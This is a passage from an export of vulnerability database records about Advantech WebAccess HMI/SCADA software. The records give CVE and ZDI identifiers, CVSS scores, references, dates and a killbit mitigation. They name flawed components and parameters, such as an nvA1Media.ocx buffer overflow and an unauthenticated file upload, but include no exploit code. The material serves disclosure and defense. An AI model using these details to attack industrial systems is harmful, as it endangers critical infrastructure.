"id": "CNVD-2016-04291" } ] }, "last_update_date": "2024-11-23T22:01:30.535000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess arbitrary code execution vulnerability (CNVD-2016-04291)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/78107" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=62426" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04291" }, { "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "db": "CNNVD", "id": "CNNVD-201606-505" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2016-4525" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-173-01" }, { "trust": 1.2, "url": "http://www.auscert.org.au/./render.html?it=36102" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-4525" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-4525" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04291" }, { "db": "VULHUB", "id": "VHN-93344" }, { "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "db": "CNNVD", "id": "CNNVD-201606-505" }, { "db": "NVD", "id": "CVE-2016-4525" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "db": "CNVD", "id": "CNVD-2016-04291" }, { "db": "VULHUB", "id": "VHN-93344" }, { "db": "BID", "id": "91346" }, { "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "db": "CNNVD", "id": "CNNVD-201606-505" }, { "db": "NVD", "id": "CVE-2016-4525" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-06-24T00:00:00", "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "date": "2016-06-24T00:00:00", "db": "CNVD", "id": "CNVD-2016-04291" }, { "date": "2016-06-25T00:00:00", "db": "VULHUB", "id": "VHN-93344" }, { "date": "2016-06-21T00:00:00", "db": "BID", "id": "91346" }, { "date": "2016-06-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "date": "2016-06-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201606-505" }, { "date": "2016-06-25T01:59:01.457000", "db": "NVD", "id": "CVE-2016-4525" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-06-24T00:00:00", "db": "CNVD", "id": "CNVD-2016-04291" }, { "date": "2016-06-28T00:00:00", "db": "VULHUB", "id": "VHN-93344" }, { "date": "2016-06-21T00:00:00", "db": "BID", "id": "91346" }, { "date": "2016-06-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "date": "2016-06-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201606-505" }, { "date": "2024-11-21T02:52:24.450000", "db": "NVD", "id": "CVE-2016-4525" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "91346" }, { "db": "CNNVD", "id": "CNNVD-201606-505" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Unspecified ActiveX Vulnerabilities that capture important information in controls", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-003355" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "db": "CNNVD", "id": "CNNVD-201606-505" } ], "trust": 0.8 } }
var-201708-1707
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-551" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-551" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-551", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-551", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-551" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-551" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4098", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-551", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-551" } ] }, "id": "VAR-201708-1707", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:43:11.194000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-551" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-551" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-551", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-551", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-551", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Connect MediaPassword Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-551" } ], "trust": 0.7 } }
var-201904-0333
Vulnerability from variot
Advantech WebAccess 8.3.4 is vulnerable to file upload attacks via unauthenticated RPC call. An unauthenticated, remote attacker can use this vulnerability to execute arbitrary code. Advantech WebAccess Contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a browser-based HMI/SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. An arbitrary file-download vulnerability 2. This may aid in further attacks. Advantech WebAccess 8.3.4 is vulnerable; other versions may also be affected. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201904-0333", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 2.4, "vendor": "advantech", "version": "8.3.4" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.3.4" } ], "sources": [ { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "CNVD", "id": "CNVD-2019-32474" }, { "db": "BID", "id": "107847" }, { "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "db": "NVD", "id": "CVE-2019-3940" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-003313" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Tenable", "sources": [ { "db": "BID", "id": "107847" }, { "db": "CNNVD", "id": "CNNVD-201904-485" } ], "trust": 0.9 }, "cve": "CVE-2019-3940", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-3940", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-32474", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-155375", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-3940", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-3940", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-3940", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-32474", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201904-485", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-155375", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2019-3940", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "CNVD", "id": "CNVD-2019-32474" }, { "db": "VULHUB", "id": "VHN-155375" }, { "db": "VULMON", "id": "CVE-2019-3940" }, { "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "db": "CNNVD", "id": "CNNVD-201904-485" }, { "db": "NVD", "id": "CVE-2019-3940" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.4 is vulnerable to file upload attacks via unauthenticated RPC call. An unauthenticated, remote attacker can use this vulnerability to execute arbitrary code. Advantech WebAccess Contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a browser-based HMI/SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. An arbitrary file-download vulnerability\n2. This may aid in further attacks. \nAdvantech WebAccess 8.3.4 is vulnerable; other versions may also be affected. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products", "sources": [ { "db": "NVD", "id": "CVE-2019-3940" }, { "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "db": "CNVD", "id": "CNVD-2019-32474" }, { "db": "BID", "id": "107847" }, { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "VULHUB", "id": "VHN-155375" }, { "db": "VULMON", "id": "CVE-2019-3940" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-3940", "trust": 3.7 }, { "db": "TENABLE", "id": "TRA-2019-15", "trust": 3.5 }, { "db": "BID", "id": "107847", "trust": 2.1 }, { "db": "CNNVD", "id": "CNNVD-201904-485", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32474", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-003313", "trust": 0.8 }, { "db": "IVD", "id": "ED3F090D-7F3E-4836-870E-ACC7E4660EF3", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-155375", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2019-3940", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "CNVD", "id": "CNVD-2019-32474" }, { "db": "VULHUB", "id": "VHN-155375" }, { "db": "VULMON", "id": "CVE-2019-3940" }, { "db": "BID", "id": "107847" }, { "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "db": "CNNVD", "id": "CNNVD-201904-485" }, { "db": "NVD", "id": "CVE-2019-3940" } ] }, "id": "VAR-201904-0333", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "CNVD", "id": "CNVD-2019-32474" }, { "db": "VULHUB", "id": "VHN-155375" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "CNVD", "id": "CNVD-2019-32474" } ] }, "last_update_date": "2024-11-23T22:12:06.937000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Code Issue Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181481" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=91310" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32474" }, { "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "db": "CNNVD", "id": "CNNVD-201904-485" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-434", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-155375" }, { "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "db": "NVD", "id": "CVE-2019-3940" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.5, "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "trust": 2.4, "url": "http://www.securityfocus.com/bid/107847" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3940" }, { "trust": 0.9, "url": "http://webaccess.advantech.com" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3940" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/434.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32474" }, { "db": "VULHUB", "id": "VHN-155375" }, { "db": "VULMON", "id": "CVE-2019-3940" }, { "db": "BID", "id": "107847" }, { "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "db": "CNNVD", "id": "CNNVD-201904-485" }, { "db": "NVD", "id": "CVE-2019-3940" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "CNVD", "id": "CNVD-2019-32474" }, { "db": "VULHUB", "id": "VHN-155375" }, { "db": "VULMON", "id": "CVE-2019-3940" }, { "db": "BID", "id": "107847" }, { "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "db": "CNNVD", "id": "CNNVD-201904-485" }, { "db": "NVD", "id": "CVE-2019-3940" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32474" }, { "date": "2019-04-09T00:00:00", "db": "VULHUB", "id": "VHN-155375" }, { "date": "2019-04-09T00:00:00", "db": "VULMON", "id": "CVE-2019-3940" }, { "date": "2019-04-03T00:00:00", "db": "BID", "id": "107847" }, { "date": "2019-05-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "date": "2019-04-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-485" }, { "date": "2019-04-09T16:29:02.100000", "db": "NVD", "id": "CVE-2019-3940" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32474" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-155375" }, { "date": "2019-10-09T00:00:00", "db": "VULMON", "id": "CVE-2019-3940" }, { "date": "2019-04-03T00:00:00", "db": "BID", "id": "107847" }, { "date": "2019-05-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003313" }, { "date": "2019-04-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-485" }, { "date": "2024-11-21T04:42:54.547000", "db": "NVD", "id": "CVE-2019-3940" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201904-485" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Code Issue Vulnerability", "sources": [ { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "CNVD", "id": "CNVD-2019-32474" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Code problem", "sources": [ { "db": "IVD", "id": "ed3f090d-7f3e-4836-870e-acc7e4660ef3" }, { "db": "CNNVD", "id": "CNNVD-201904-485" } ], "trust": 0.8 } }
var-201602-0476
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C76 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0476", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-137" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-137" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": 